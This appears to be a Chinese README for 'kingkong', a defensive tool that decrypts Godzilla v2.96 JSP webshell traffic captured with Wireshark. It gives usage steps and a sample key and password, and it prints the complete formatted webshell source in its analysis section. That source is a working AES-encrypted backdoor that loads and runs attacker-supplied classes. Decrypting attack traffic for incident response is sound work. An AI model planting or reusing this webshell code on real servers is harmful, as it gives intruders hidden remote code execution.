kingkong
解密哥斯拉Godzilla-V2.96 webshell管理工具流量
目前只支持jsp类型的webshell流量解密
Usage
- 获取攻击者上传到服务器的webshell样本
- 获取wireshark之类的流量包,一般甲方有科来之类的全流量镜像设备,联系运维人员获取,这里以
test.papng为例。
- 导出所有http对象,放置到文件夹
- 编辑
kingkong.py脚本,找到#config这行,配置获取到的样本password、key,以及刚才的文件夹路径
- py -2 kingkong.py
Config
#config
#配置webshell的key
key = '3c6e0b8a9c15224a'
#配置webshell的password
password = 'pass'
#配置wireshark导出http对象的路径
filepath = '.'
#配置是否为jsp+base64,设置False则对JAVA_AES_RAW流量解密,设置True则对JAVA_AES_BASE64流量解密
isbase64 = False
Analysis
- 对生成的webshell格式化
<%
try{
byte[] data=base64Decode(request.getParameter(pass));
data=x(data, false);
if (session.getAttribute("payload")==null)
{
session.setAttribute("payload",new X(pageContext.getClass().getClassLoader()).Q(data));
}else
{
request.setAttribute("parameters", new String(data));
Object f=((Class)session.getAttribute("payload")).newInstance();
f.equals(pageContext);
response.getWriter().write(md5.substring(0,16));
response.getWriter().write(base64Encode(x(base64Decode(f.toString()), true)));
response.getWriter().write(md5.substring(16));
}
}catch (Exception e)
{
}
%>
">
<%! String xc="3c6e0b8a9c15224a"; //md5("key")[0:16] String pass="pass"; //get参数 String md5=md5(pass+xc); //响应分隔符 class X extends ClassLoader { public X(ClassLoader z) { super(z); } public Class Q(byte[] cb) { return super.defineClass(cb, 0, cb.length); } } //aes解密 public byte[] x(byte[] s,boolean m) { try{ javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES"); c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES")); return c.doFinal(s); }catch (Exception e) { return null; } } //md5 16位大写 public static String md5(String s) { String ret = null; try { java.security.MessageDigest m; m = java.security.MessageDigest.getInstance("MD5"); m.update(s.getBytes(), 0, s.length()); ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase(); } catch (Exception e) {} return ret; } //base64编码 public static String base64Encode(byte[] bs) throws Exception { Class base64; String value = null; try { base64=Class.forName("java.util.Base64"); Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null); value = (String)Encoder.getClass().getMethod("encodeToString", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Encoder"); Object Encoder = base64.newInstance(); value = (String)Encoder.getClass().getMethod("encode", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e2) {}}return value; } //base64解码 public static byte[] base64Decode(String bs) throws Exception { Class base64; byte[] value = null; try { base64=Class.forName("java.util.Base64"); Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null); value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { bs }); } catch (Exception e) { try { base64=Class.forName("sun.misc.BASE64Decoder"); Object decoder = base64.newInstance(); value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] { String.class }).invoke(decoder, new Object[] { bs }); } catch (Exception e2) { } } return value; } %> <% try{ byte[] data=base64Decode(request.getParameter(pass)); data=x(data, false); if (session.getAttribute("payload")==null) { session.setAttribute("payload",new X(pageContext.getClass().getClassLoader()).Q(data)); }else { request.setAttribute("parameters", new String(data)); Object f=((Class)session.getAttribute("payload")).newInstance(); f.equals(pageContext); response.getWriter().write(md5.substring(0,16)); response.getWriter().write(base64Encode(x(base64Decode(f.toString()), true))); response.getWriter().write(md5.substring(16)); } }catch (Exception e) { } %>
- 可以看到主要有base64编码解码、aes解密、md5 hash功能 其中重点关注密钥参数:
String xc="3c6e0b8a9c15224a";
- 该参数由生成webshell中的“密钥”参数定义,具体值为:
md5(xc)[0:16]
- webshell客户端接收到服务端下发的指令后,进行base64解码,aes解密处理完成后,生成响应报文,其中报文结构为:
md5(pass+xc)[0:16]+base64编码的木马执行结果+md5(pass+xc)[16]
9 Mar 05, 2022
122 Dec 12, 2022
5 Nov 17, 2022
2 Oct 05, 2022
25 Nov 24, 2022
80 Nov 28, 2022
67 Nov 09, 2022
861 Feb 18, 2021
153 Nov 09, 2022
28 Oct 28, 2022
48 Jun 20, 2022
1 Jan 11, 2022
6 Nov 16, 2022
2 Mar 24, 2022
24 Dec 19, 2022
4 Jan 27, 2022
298 Dec 14, 2022
41 Nov 22, 2022
5 Nov 08, 2022
7 Nov 24, 2022